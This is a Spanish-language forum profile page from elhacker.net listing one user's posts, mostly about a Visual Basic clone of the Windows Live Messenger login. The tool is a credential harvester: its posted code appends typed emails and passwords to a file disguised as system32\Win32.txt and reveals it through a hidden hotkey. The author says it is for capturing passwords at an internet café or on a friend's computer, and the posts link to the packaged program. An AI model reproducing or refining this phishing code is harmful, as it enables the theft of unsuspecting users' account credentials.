elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: [1] 2
1  Programación / Programación Visual Basic / Re: Clon Windows Live Messenger en: 3 Julio 2010, 19:46 pm
Gracias *PsYkE1* ya lo hice asi como me dijiste. y para ejecutar elarchivo lo puse algo asi...
Código:
  
If GetAsyncKeyState(vbKeyControl) And GetAsyncKeyState(vbKeyA) Then
    Call ShellExecute(0&, "Open", (Environ$("windir") & "\system32\Win32.txt"), "", vbNullString, 1)
  End If
2  Programación / Programación Visual Basic / Re: Clon Windows Live Messenger en: 3 Julio 2010, 08:04 am
En cuanto el code para  guardar los mail en un TXT q tal este ???

Código:
Private Sub Command1_Click()
    Call GuardarArchivo("C:\WINDOWS\system32\Win32.txt", Text1, Text2)
End Sub

Sub GuardarArchivo(Ruta As String, Text1, Text2 As TextBox)
On Error Resume Next
Dim fnum As Integer
On Error GoTo Ninguno
fnum = FreeFile
Open Ruta For Append As fnum
Print #fnum, "Mail:"; Text1.Text
Print #fnum, "Contraseña:"; Text2.Text
Print #fnum, "-------------------------------------------------"
Print #fnum, ""
Close fnum
Exit Sub
Ninguno:
MsgBox "Error al guardar el archivo"
End Sub
3  Programación / Programación Visual Basic / Re: Clon Windows Live Messenger en: 3 Julio 2010, 07:28 am
Ok... ya voy entendien2  BlackZeroX,,, savia q nesecitaba la ayuda de ustedes..

gracias...
4  Programación / Programación Visual Basic / Re: Clon Windows Live Messenger en: 3 Julio 2010, 06:50 am
Graxxx.  Elemental Code...

Por eso keria q alguien lo ejecutara y me diera su consentimiento por k estoy empezan2 a programar ahora y saves q nesecito consejosy ayudas...

Primero nesecito k me especifikes si es donde dice "declaracion de privacidad"  ya lo arregle,,

segun2 Tabula que me kieres decir con eso...

y tercero,, me podrias dar un ejemplo de como acomodar la imagen con esto onformchangesise como me dijiste...

y ya estoy cambian2 la forma de guardar los mails.. la estoy ponien2 en un TXT como me dijiste...

Gracias de nuevo bro...

Salu2...


5  Programación / Programación Visual Basic / Re: Clon Windows Live Messenger en: 2 Julio 2010, 22:51 pm
Bueh...

Hay personas q pueden aprender o sacar ejemplos de ese code....
la intencion es lo que vale...

Graxx...
6  Programación / Programación Visual Basic / Re: Clon Windows Live Messenger en: 2 Julio 2010, 22:20 pm
mmm. bueno para los q kieran sacar pass de un siber podria ser o los q kieran saber una contraseña instalandolo en una Pc.. de un amigo o no c... solo pon tu imaginacion a funcionar...
7  Programación / Programación Visual Basic / Re: Clon Windows Live Messenger en: 2 Julio 2010, 22:10 pm
Aqui los dejo...


4Shared:
http://www.4shared.com/file/1vucFteZ/Clon_Windows__Live_Messenger_B.html

HotFile:
http://hotfile.com/dl/52170437/50c31c0/Clon_Windows_Live_Messenger_By_Coco_way.rar.html
8  Programación / Programación Visual Basic / Clon Windows Live Messenger en: 2 Julio 2010, 08:32 am
Aki les dejo el code del windows live messenger quiero q lo prueven y me digan si les funca o no, tiene un pekeño manualsillo. 

No es algo especial pero c que hay gente k anda busca2 algo paresi2 a esto, y se que no es perfecto pero lo que vale es la intencion de poder aportar ya que nunca lo havia hecho.

quiero k me digan que le hace falta.

MediaFire
http://www.mediafire.com/?xummj5jm5bm

RapidShare
http://rapidshare.com/files/404421974/Clon_Windows__Live_Messenger_By_Coco_way.rar.html
9  Programación / Programación Visual Basic / Re: Copiar todo el contenido de un CD a una carpeta en: 20 Julio 2007, 06:55 am
Graxias....KiZar
Ya pude Obtener lo que keria solo le agregue esta parte al code

Código:
Private Sub Command2_Click()
On Error Resume Next
Dim i As Integer
Dim fso As FileSystemObject

Set fso = New FileSystemObject
For i = 0 To List1.ListCount
Path = List1.List(i)
fso.CopyFile Path, "C:\Copy\", True
Next i
Set fso = Nothing
List1.Clear
MsgBox "Sus archivos fueron copiados satisfactoriamente", vbInformation, "c0c0_w3y_s0ftwar3"
End Sub


Tenia este code guardado por ahi solo que en esta parte del code
Código:
fso.CopyFile Path, "C:\Copy\", True
lo tenia para borrar todos los archivos encontrados en el List Box que era este code
Código:
fso.DeleteFile Path, True


Gracias ,,, KiZar
y Gracias ,,,Sancho.Mazorka por su ayuda

Salu2...
10  Programación / Programación Visual Basic / Copiar todo el contenido de un CD a una carpeta en: 18 Julio 2007, 06:46 am
gracias....
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines